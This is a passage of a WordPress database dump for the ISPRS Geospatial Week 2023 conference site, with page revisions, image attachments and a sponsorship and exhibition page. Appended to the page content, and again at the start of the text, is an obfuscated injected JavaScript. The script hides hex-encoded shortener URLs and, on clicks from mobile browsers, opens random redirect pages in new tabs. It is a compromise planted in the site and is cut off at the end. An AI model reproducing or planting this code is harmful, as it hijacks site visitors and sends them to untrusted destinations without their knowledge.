_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','WORKSHOPS','','inherit','closed','closed','','2372-revision-v1','','','2022-11-11 15:04:25','2022-11-11 15:04:25','',2372,'https://gsw2023.com/?p=3275',0,'revision','',0),
(3276,1,'2022-11-11 15:12:08','2022-11-11 15:12:08','','2022-10-24_104028','','inherit','open','closed','','2022-10-24_104028','','','2022-11-11 15:12:08','2022-11-11 15:12:08','',2920,'https://gsw2023.com/wp-content/uploads/2022/11/2022-10-24_104028.jpg',0,'attachment','image/jpeg',0),
(3277,1,'2022-11-11 15:14:31','2022-11-11 15:14:31','','pyramids-of-Giza-in-Egypt','','inherit','open','closed','','pyramids-of-giza-in-egypt','','','2022-11-11 15:14:31','2022-11-11 15:14:31','',2920,'https://gsw2023.com/wp-content/uploads/2022/11/pyramids-of-Giza-in-Egypt.jpg',0,'attachment','image/jpeg',0),
(3278,1,'2022-11-11 15:15:23','2022-11-11 15:15:23','','Invest All Over Egypt Today','Invest All Over Egypt Today','inherit','open','closed','','invest-all-over-egypt-today','','','2022-11-11 15:15:23','2022-11-11 15:15:23','',2920,'https://gsw2023.com/wp-content/uploads/2022/11/invest-901630488.jpg',0,'attachment','image/jpeg',0),
(3279,1,'2022-11-11 15:17:15','2022-11-11 15:17:15','[vc_row][vc_column][vc_column_text]\r\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\r\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\r\n<h5></h5>\r\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\r\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\r\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\r\n<h5></h5>\r\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\r\n<h5></h5>\r\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\r\n<h5></h5>\r\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\r\n<h5></h5>\r\n<h5>The GSW2023 Organizing Committee.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\r\n<strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2930\" img_size=\"1600x2000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]\r\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\r\n(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\r\n<strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong>\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\r\n 	<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\r\n</ul>\r\n&nbsp;\r\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\r\n<h6><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h6>\r\n<h5></h5>\r\n<h5><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5><b>Fax:(+203) <strong>5497598</strong></b></h5>\r\n&nbsp;\r\n\r\n<strong>Main Campus</strong>\r\n\r\n<strong> Alexandria, </strong><strong>Miami </strong><strong>Campus</strong>\r\n\r\n<strong>P.O. Box 1029 -Gamal Abdelnaser st. </strong><strong>-Miami </strong>\r\n\r\n<strong>Tel :(+203) 5565429/ 5506042</strong>\r\n\r\n<b>Fax:(+203) 5487786/ 5506042  </b>\r\n\r\n&nbsp;\r\n\r\n<strong>Alexandria, </strong><strong>Abu kir Campus</strong>\r\n\r\n<strong>Tel :(+203) 5622366/ 5622388</strong>\r\n\r\n<b>Fax:(+203) 5610950</b>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][ultimate_info_table design_style=\"design04\" color_scheme=\"blue\" package_heading=\"CONFERENCE PROGRAM FOR EXHIBITORS\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"170\">\r\n<h5><strong>September 2</strong></h5>\r\n</td>\r\n<td width=\"189\">\r\n<h5><strong>9:00 – 5:00</strong></h5>\r\n</td>\r\n<td width=\"217\">\r\n<h5><strong>Tutorial Day</strong></h5>\r\n<h5><strong>Exhibition Setup</strong></h5>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">\r\n<h5><strong>September 3</strong></h5>\r\n</td>\r\n<td width=\"189\">\r\n<h5></h5>\r\n<h5><strong>12:00-17:00</strong></h5>\r\n<h5><strong>18:00 – 20:00</strong></h5>\r\n</td>\r\n<td width=\"217\">\r\n<h5></h5>\r\n<h5><strong>Exhibition Opening</strong></h5>\r\n<h5><strong>Welcome Reception</strong></h5>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">\r\n<h5><strong>September 4</strong></h5>\r\n</td>\r\n<td width=\"189\">\r\n<h5></h5>\r\n<h5><strong>9:00 – 17:00</strong></h5>\r\n<h5><strong>18:00 – 20:00</strong></h5>\r\n</td>\r\n<td width=\"217\">\r\n<h5></h5>\r\n<h5><strong>Exhibition</strong></h5>\r\n<h5><strong>Exhibitors’ reception</strong></h5>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">\r\n<h5><strong>September 5</strong></h5>\r\n</td>\r\n<td width=\"189\">\r\n<h5></h5>\r\n<h5><strong>9:00 – 15:00</strong></h5>\r\n<h5><strong>15:00 – 18:00</strong></h5>\r\n</td>\r\n<td width=\"217\">\r\n<h5></h5>\r\n<h5><strong>Exhibition</strong></h5>\r\n<h5><strong>Dismantle Exhibition</strong></h5>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/ultimate_info_table][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_column_text]\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</strong></h5>\r\n&nbsp;\r\n<h5><strong>INFORMATION</strong></h5>\r\n<strong>For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact<a href=\"mailto:elsheimy@ucalgary.ca\"> the organizing committee by mail (elsheimy@ucalgary.ca</a> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u></strong> ).[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 